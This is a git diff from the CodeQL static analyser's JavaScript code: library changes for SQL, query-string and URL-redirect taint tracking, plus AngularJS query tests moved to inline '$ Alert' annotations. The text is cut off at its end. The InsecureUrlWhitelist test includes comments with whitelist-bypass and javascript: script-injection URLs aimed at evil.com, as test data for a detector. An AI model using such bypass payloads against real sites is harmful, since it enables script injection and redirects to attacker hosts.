diff --git a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll index 218f2f8366e5..9d106251a211 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll @@ -221,7 +221,10 @@ private module Postgres { /** Gets a value that is plugged into a raw placeholder variable, making it a sink for SQL injection. */ private DataFlow::Node getARawValue() { - result = this.getValues() and this.getARawParameterName() = "1" // Special case: if the argument is not an array or object, it's just plugged into $1 + result = this.getValues() and + this.getARawParameterName() = "1" and // Special case: if the argument is not an array or object, it's just plugged into $1 + not result instanceof DataFlow::ArrayCreationNode and + not result instanceof DataFlow::ObjectLiteralNode or exists(DataFlow::SourceNode values | values = this.getValues().getALocalSource() | result = values.getAPropertyWrite(this.getARawParameterName()).getRhs() diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll index 0a262d154b2b..90dcc886ed43 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll @@ -421,3 +421,22 @@ private module ClosureLibraryUri { } } } + +private class QueryStringStringification extends DataFlow::SummarizedCallable { + QueryStringStringification() { this = "query-string stringification" } + + override DataFlow::InvokeNode getACall() { + result = + API::moduleImport(["querystring", "query-string", "querystringify", "qs"]) + .getMember("stringify") + .getACall() or + result = API::moduleImport("url-parse").getMember("qs").getMember("stringify").getACall() or + result = API::moduleImport("parseqs").getMember("encode").getACall() + } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + preservesValue = false and + input = ["Argument[0]", "Argument[0].AnyMemberDeep"] and + output = "ReturnValue" + } +} diff --git a/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll b/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll index e889480b48b7..e6c3345b2c7e 100644 --- a/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll +++ b/javascript/ql/lib/semmle/javascript/security/dataflow/ServerSideUrlRedirectQuery.qll @@ -20,7 +20,11 @@ module ServerSideUrlRedirectConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { sink instanceof Sink } - predicate isBarrier(DataFlow::Node node) { node instanceof Sanitizer } + predicate isBarrier(DataFlow::Node node) { + node instanceof Sanitizer + or + node = HostnameSanitizerGuard::getABarrierNode() + } predicate isBarrierOut(DataFlow::Node node) { hostnameSanitizingPrefixEdge(node, _) } @@ -69,10 +73,12 @@ deprecated class Configuration extends TaintTracking::Configuration { } /** + * DEPRECATED. This is no longer used as a sanitizer guard. + * * A call to a function called `isLocalUrl` or similar, which is * considered to sanitize a variable for purposes of URL redirection. */ -class LocalUrlSanitizingGuard extends DataFlow::CallNode { +deprecated class LocalUrlSanitizingGuard extends DataFlow::CallNode { LocalUrlSanitizingGuard() { this.getCalleeName().regexpMatch("(?i)(is_?)?local_?url") } /** DEPRECATED. Use `blocksExpr` instead. */ diff --git a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll index 9e92f70af69f..42eb94230ae6 100644 --- a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll +++ b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll @@ -4,14 +4,22 @@ private import codeql.util.test.InlineExpectationsTest module Impl implements InlineExpectationsTestSig { private import javascript - final private class LineCommentFinal = LineComment; + final class ExpectationComment = ExpectationCommentImpl; - class ExpectationComment extends LineCommentFinal { - string getContents() { result = this.getText() } + class Location = JS::Location; + + abstract private class ExpectationCommentImpl extends Locatable { + abstract string getContents(); /** Gets this element's location. */ Location getLocation() { result = super.getLocation() } } - class Location = JS::Location; + private class JSComment extends ExpectationCommentImpl instanceof Comment { + override string getContents() { result = super.getText() } + } + + private class HtmlComment extends ExpectationCommentImpl instanceof HTML::CommentNode { + override string getContents() { result = super.getText() } + } } diff --git a/javascript/ql/src/change-notes/2025-02-21-test-suite.md b/javascript/ql/src/change-notes/2025-02-21-test-suite.md new file mode 100644 index 000000000000..2fe2a2884964 --- /dev/null +++ b/javascript/ql/src/change-notes/2025-02-21-test-suite.md @@ -0,0 +1,5 @@ +--- +category: fix +--- +* Fixed a recently-introduced bug that caused `js/server-side-unvalidated-url-redirection` to ignore + valid hostname checks and report spurious alerts after such a check. The original behaviour has been restored. diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref index a29deed369ec..9d7d0764c034 100644 --- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref @@ -1 +1,2 @@ -AngularJS/DeadAngularJSEventListener.ql \ No newline at end of file +query: AngularJS/DeadAngularJSEventListener.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js index d8616c9e2399..58b700a4c3f2 100644 --- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js @@ -1,50 +1,50 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on('destroy', cleanup); // BAD + $scope.$on('destroy', cleanup); // $ Alert }) .controller('MyController', ["$scope", function(s) { - s.$on('destroy', cleanup); // BAD + s.$on('destroy', cleanup); // $ Alert }]) .controller('MyController', function($scope) { var destroy = 'destroy'; - $scope.$on(destroy, cleanup); // BAD + $scope.$on(destroy, cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$destroy', cleanup); // GOOD + $scope.$on('$destroy', cleanup); }) .controller('MyController', function($scope) { $scope.$emit('foo'); - $scope.$on('foo', cleanup); // GOOD + $scope.$on('foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('bar', cleanup); // BAD + $scope.$on('bar', cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$locationChangeStart', cleanup); // OK + $scope.$on('$locationChangeStart', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib1.foo', cleanup); // OK + $scope.$on('lib1.foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib2:foo', cleanup); // OK + $scope.$on('lib2:foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('onClick', cleanup); // OK + $scope.$on('onClick', cleanup); }) .controller('MyController', function($scope) { function f($scope){ $scope.$emit('probablyFromUserCode1') } - $scope.$on('probablyFromUserCode1', cleanup); // OK + $scope.$on('probablyFromUserCode1', cleanup); }) .controller('MyController', function($scope) { function f($scope){ var scope = $scope; scope.$emit('probablyFromUserCode2') } - $scope.$on('probablyFromUserCode2', cleanup); // OK + $scope.$on('probablyFromUserCode2', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('event-from-AngularJS-expression', cleanup); // GOOD + $scope.$on('event-from-AngularJS-expression', cleanup); }) ; diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref index f7a0044a73f8..7089aacb60e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref @@ -1 +1,2 @@ -AngularJS/DependencyMismatch.ql \ No newline at end of file +query: AngularJS/DependencyMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js index c60a937b4c45..3afff0e3a50b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js @@ -1,36 +1,36 @@ angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // NOT OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // $ Alert angular.module('app2') - .directive('mydirective', [ '$compile', function($compile, $http) { // NOT OK + .directive('mydirective', [ '$compile', function($compile, $http) { // $ Alert // ... }]); angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); // OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); angular.module('app2') - .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // OK + .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // ... }]); angular.module('app3', []) - .run(function(dep1, dep3) {}); // OK + .run(function(dep1, dep3) {}); angular.module('app4') - .directive('mydirective', function($compile, $http) { // OK + .directive('mydirective', function($compile, $http) { // ... }); angular.module('app5') - .directive('mydirective', [ 'fully.qualified.name', function(name) { // OK + .directive('mydirective', [ 'fully.qualified.name', function(name) { // ... }]) angular.module('app6') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js index 2ef8930246f9..312af00754e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js @@ -1,17 +1,17 @@ angular.module('app', []) .config(function($sceProvider) { - $sceProvider.enabled(false); // BAD + $sceProvider.enabled(false); // $ Alert }) .config(['otherProvider', function($sceProvider) { - $sceProvider.enabled(false); // OK + $sceProvider.enabled(false); }]) .config(['$sceProvider', function(x) { - x.enabled(false); // BAD + x.enabled(false); // $ Alert }]) .config(function($sceProvider) { - $sceProvider.enabled(true); // OK + $sceProvider.enabled(true); }) .config(function($sceProvider) { var x = false; - $sceProvider.enabled(x); // BAD + $sceProvider.enabled(x); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref index 7a74c3338a31..0e0c8bd12433 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref @@ -1 +1,2 @@ -AngularJS/DisablingSce.ql \ No newline at end of file +query: AngularJS/DisablingSce.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref index 05ed8405fa82..b1ad3523f06f 100644 --- a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref @@ -1 +1,2 @@ -AngularJS/DoubleCompilation.ql +query: AngularJS/DoubleCompilation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js index f46e74bc7e97..c1248255132b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js +++ b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js @@ -11,7 +11,7 @@ angular.module('app').directive('addMouseover', function($compile) { attrs.$set('addMouseover', null); // To stop infinite compile loop element.append(newEl); - $compile(element)(scope); // Double compilation + $compile(element)(scope); // $ Alert - Double compilation } } }) diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref index 24c81938cc3e..0a670daee6df 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref @@ -1 +1,2 @@ -AngularJS/IncompatibleService.ql \ No newline at end of file +query: AngularJS/IncompatibleService.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js index 51dbd1f76d48..c3855f207c04 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js @@ -11,68 +11,68 @@ angular.module('myModule', []) ; angular.module('myModule2', []) - .controller('c0', function(factoryId){}) // OK - .controller('c1', function(serviceId){}) // OK - .controller('c2', function(valueId){}) // OK - .controller('c3', function(constantId){}) // OK - .controller('c4', function(providerId){}) // OK - .controller('c5', function($http){}) // OK - .controller('c6', function($provider){}) // NOT OK - .controller('c7', function($scope){}) // OK - .controller('c8', function($compile){}) // OK - .controller('c9', function(UNKNOWN){}) // OK - .controller('c10', function(providerIdProvider){}) // NOT OK - .controller('c11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .controller('c12', function($provide){}) // OK (special case) - .controller('c13', function(providerId2Provider){}) // NOT OK + .controller('c0', function(factoryId){}) + .controller('c1', function(serviceId){}) + .controller('c2', function(valueId){}) + .controller('c3', function(constantId){}) + .controller('c4', function(providerId){}) + .controller('c5', function($http){}) + .controller('c6', function($provider){}) // $ Alert + .controller('c7', function($scope){}) + .controller('c8', function($compile){}) + .controller('c9', function(UNKNOWN){}) + .controller('c10', function(providerIdProvider){}) // $ Alert + .controller('c11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .controller('c12', function($provide){}) // OK - special case + .controller('c13', function(providerId2Provider){}) // $ Alert - .factory('s0', function(factoryId){}) // OK - .factory('s1', function(serviceId){}) // OK - .factory('s2', function(valueId){}) // OK - .factory('s3', function(constantId){}) // OK - .factory('s4', function(providerId){}) // OK - .factory('s5', function($http){}) // OK - .factory('s6', function($provider){}) // NOT OK - .factory('s7', function($scope){}) // NOT OK - .factory('s8', function($compile){}) // OK - .factory('s9', function(UNKNOWN){}) // OK - .factory('s10', function(providerIdProvider){}) // NOT OK - .factory('s11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .factory('s12', function($provide){}) // OK (special case) - .factory('s13', function(providerId2Provider){}) // NOT OK + .factory('s0', function(factoryId){}) + .factory('s1', function(serviceId){}) + .factory('s2', function(valueId){}) + .factory('s3', function(constantId){}) + .factory('s4', function(providerId){}) + .factory('s5', function($http){}) + .factory('s6', function($provider){}) // $ Alert + .factory('s7', function($scope){}) // $ Alert + .factory('s8', function($compile){}) + .factory('s9', function(UNKNOWN){}) + .factory('s10', function(providerIdProvider){}) // $ Alert + .factory('s11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .factory('s12', function($provide){}) // OK - special case + .factory('s13', function(providerId2Provider){}) // $ Alert - .run(function(factoryId){}) // OK - .run(function(serviceId){}) // OK - .run(function(valueId){}) // OK - .run(function(constantId){}) // OK - .run(function(providerId){}) // OK - .run(function($http){}) // OK - .run(function($provider){}) // NOT OK - .run(function($scope){}) // NOT OK - .run(function($compile){}) // OK - .run(function(UNKNOWN){}) // OK - .run(function(providerIdProvider){}) // NOT OK - .run(function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .run(function($provide){}) // OK (special case) - .run(function(providerId2Provider){}) // NOT OK + .run(function(factoryId){}) + .run(function(serviceId){}) + .run(function(valueId){}) + .run(function(constantId){}) + .run(function(providerId){}) + .run(function($http){}) + .run(function($provider){}) // $ Alert + .run(function($scope){}) // $ Alert + .run(function($compile){}) + .run(function(UNKNOWN){}) + .run(function(providerIdProvider){}) // $ Alert + .run(function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .run(function($provide){}) // OK - special case + .run(function(providerId2Provider){}) // $ Alert - .config(function(factoryId){}) // NOT OK - .config(function(serviceId){}) // NOT OK - .config(function(valueId){}) // NOT OK - .config(function(constantId){}) // OK - .config(function(providerId){}) // NOT OK - .config(function($http){}) // NOT OK - .config(function($provider){}) // OK - .config(function($scope){}) // NOT OK - .config(function($compile){}) // OK - .config(function(UNKNOWN){}) // OK - .config(function(providerIdProvider){}) // OK - .config(function(providerId, UNKNOWN){}) // NOT OK, but only one error - .config(function($provide){}) // OK (special case) - .config(function(valueId2){}) // NOT OK + .config(function(factoryId){}) // $ Alert + .config(function(serviceId){}) // $ Alert + .config(function(valueId){}) // $ Alert + .config(function(constantId){}) + .config(function(providerId){}) // $ Alert + .config(function($http){}) // $ Alert + .config(function($provider){}) + .config(function($scope){}) // $ Alert + .config(function($compile){}) + .config(function(UNKNOWN){}) + .config(function(providerIdProvider){}) + .config(function(providerId, UNKNOWN){}) // $ Alert - but only one error + .config(function($provide){}) // OK - special case + .config(function(valueId2){}) // $ Alert // service: same restrcitions as .factory - .service('s14', function(factoryId){}) // OK - .service('s15', function($provider){}) // NOT OK + .service('s14', function(factoryId){}) + .service('s15', function($provider){}) // $ Alert ; diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref index 26714392ac84..7c18e955f64c 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref @@ -1 +1,2 @@ -AngularJS/InsecureUrlWhitelist.ql \ No newline at end of file +query: AngularJS/InsecureUrlWhitelist.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 713e36e52233..1ee742c6d6a2 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,24 +1,24 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // BAD (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // BAD (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // BAD (exploit: https://evil.com/?ignore=://example.com/a) - "https://example.**", // BAD (exploit: https://example.evil.com or http://example.:foo@evil.com) - "https://example.*", // BAD (exploit: https://example.UnexpectedTLD) + "**://example.com/*", // $ RelatedLocation - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ RelatedLocation - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ RelatedLocation - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ RelatedLocation - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ RelatedLocation - exploit: https://example.UnexpectedTLD - "https://example.com", // OK - "https://example.com/**", // OK - "https://example.com/*", // OK - "https://example.com/foo/*", // OK - "https://example.com/foo/**", // OK - "https://example.com/foo/*/bar", // OK - "https://example.com/foo/**/bar", // OK - "https://example.com/?**", // OK - "https://example.com/?**://example.com", // OK + "https://example.com", + "https://example.com/**", + "https://example.com/*", + "https://example.com/foo/*", + "https://example.com/foo/**", + "https://example.com/foo/*/bar", + "https://example.com/foo/**/bar", + "https://example.com/?**", + "https://example.com/?**://example.com", "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // BAD (exploit http://wwwaexample.org (dots are not escaped)) - ]); + /http:\/\/www.example.org/g // $ MISSING: RelatedLocation - (exploit http://wwwaexample.org (dots are not escaped)) + ]); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref index 67c8ca36e697..5de5a3bd1b11 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref @@ -1 +1,2 @@ -AngularJS/MissingExplicitInjection.ql \ No newline at end of file +query: AngularJS/MissingExplicitInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js index 65d3e74ceef0..629b62d5b08e 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js @@ -1,27 +1,27 @@ (function(){ - function injected1(name){} // NOT OK + function injected1(name){} // $ Alert angular.module('app1').controller('controller1', injected1); - function injected2(name){} // OK + function injected2(name){} injected2.$inject = ['name']; angular.module('app2').controller('controller2', injected2); - function injected3(name){} // OK + function injected3(name){} angular.module('app3').controller('controller3', ['name', injected3]); - angular.module('app4').controller('controller4', function(){}); // OK + angular.module('app4').controller('controller4', function(){}); - angular.module('app5').controller('controller5', function(name){}); // NOT OK + angular.module('app5').controller('controller5', function(name){}); // $ Alert - function injected6(){} // OK + function injected6(){} angular.module('app6').controller('controller6', injected6); - function notInjected7(name){} // OK + function notInjected7(name){} var obj7 = { controller: notInjected7 }; - function injected8(name){} // OK (false negative: we do not track through properties) + function injected8(name){} // OK - false negative: we do not track through properties var obj8 = { controller: injected8 }; @@ -29,14 +29,14 @@ var $injector = angular.injector(); - function injected9(name){} // NOT OK + function injected9(name){} // $ Alert $injector.invoke(injected9) - function injected10(name){} // OK + function injected10(name){} injected10.$inject = ['name']; $injector.invoke(injected10) - function injected11(name){} // OK + function injected11(name){} $injector.invoke(['name', injected11]) })(); diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected index 227dcedf486c..ceb747011ba8 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected @@ -2,5 +2,5 @@ | repeated-injection.js:6:5:6:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:8:54:8:73 | ['name', $Injected2] | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:11:5:11:22 | $Injected3.$inject | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:12:5:12:22 | $Injected3.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref index 0cb3bca6dd4c..fdd21bbbde39 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.qlref @@ -1 +1,2 @@ -AngularJS/RepeatedInjection.ql \ No newline at end of file +query: AngularJS/RepeatedInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js index 942a9ab1239e..9987e60d0ea5 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js @@ -1,36 +1,36 @@ (function(){ - function $Injected1(name){} // OK + function $Injected1(name){} $Injected1.$inject = ['name']; angular.module('app1').controller('controller1', $Injected1); - function $Injected2(name){} // NOT OK + function $Injected2(name){} // $ Alert $Injected2.$inject = ['name']; angular.module('app2').controller('controller2', ['name', $Injected2]); - function $Injected3(name){} // NOT OK + function $Injected3(name){} // $ Alert $Injected3.$inject = ['name']; $Injected3.$inject = ['name']; angular.module('app3').controller('controller3', $Injected3); - function not$Injected4(name){} // OK + function not$Injected4(name){} angular.module('app4').controller('controller4', not$Injected4); - function not$Injected5(name){} // OK + function not$Injected5(name){} angular.module('app5').controller('controller5', ['name', not$Injected5]); - function $Injected6(name){} // OK (because it never becomes registered) + function $Injected6(name){} // OK - because it never becomes registered $Injected6.$inject = ['name']; $Injected6.$inject = ['name']; - function not$Injected7(name){} // OK + function not$Injected7(name){} angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', not$Injected7); - angular.module('app8').controller('controller8', function inline8(name){}); // OK + angular.module('app8').controller('controller8', function inline8(name){}); - angular.module('app9').controller('controller9', ['name', function inline9(name){}]); // OK + angular.module('app9').controller('controller9', ['name', function inline9(name){}]); - function $Injected10(name){ // NOT OK (alert formatting for multi-line function) + function $Injected10(name){ // $ Alert - alert formatting for multi-line function } $Injected10.$inject = ['name']; angular.module('app10').controller('controller10', ['name', $Injected10]); diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected index d5b4c267c39e..2ca924302a23 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected @@ -2,4 +2,4 @@ | unused-angular-dependency.js:14:14:14:39 | ["unuse ... n() {}] | This function has 0 parameters, but 1 dependency is injected into it. | | unused-angular-dependency.js:16:14:16:53 | ["used2 ... d2) {}] | This function has 1 parameter, but 2 dependencies are injected into it. | | unused-angular-dependency.js:17:14:17:52 | ["unuse ... n() {}] | This function has 0 parameters, but 2 dependencies are injected into it. | -| unused-angular-dependency.js:18:14:18:105 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | +| unused-angular-dependency.js:18:14:18:106 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref index e47f1e1bb452..4ae72160a8d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref @@ -1 +1,2 @@ -AngularJS/UnusedAngularDependency.ql \ No newline at end of file +query: AngularJS/UnusedAngularDependency.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js index f35cc62947ed..14e94d23d6d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js @@ -1,28 +1,28 @@ (function(){ - function f1(used2, unused5) {used2;} // OK (suppressed by js/unused-parameter) + function f1(used2, unused5) {used2;} // OK - suppressed by js/unused-parameter // this function avoid suppression from js/unused-parameter by explicitly targeting one its weaknesses - function f2(unused7, used3) {used3;} // NOT OK + function f2(unused7, used3) {used3;} // $ Alert this.f2 = f2; angular.module('app1', []) .run(function() {}) - .run(function(unused1) {}) // OK (suppressed by js/unused-parameter) - .run(function(unused2, unused3) {}) // OK (suppressed by js/unused-parameter) - .run(function(used1, unused4) {used1;}) // OK (suppressed by js/unused-parameter) + .run(function(unused1) {}) // OK - suppressed by js/unused-parameter + .run(function(unused2, unused3) {}) // OK - suppressed by js/unused-parameter + .run(function(used1, unused4) {used1;}) // OK - suppressed by js/unused-parameter .run(f1) - .run(["unused6", function() {}]) // NOT OK + .run(["unused6", function() {}]) // $ Alert .run(f2) - .run(["used2", "unused9", function(used2) {}]) // NOT OK - .run(["unused10", "unused11", function() {}]) // NOT OK - .run(["used2", "unused12", function(used2) { // NOT OK (alert formatting for multi-line function) + .run(["used2", "unused9", 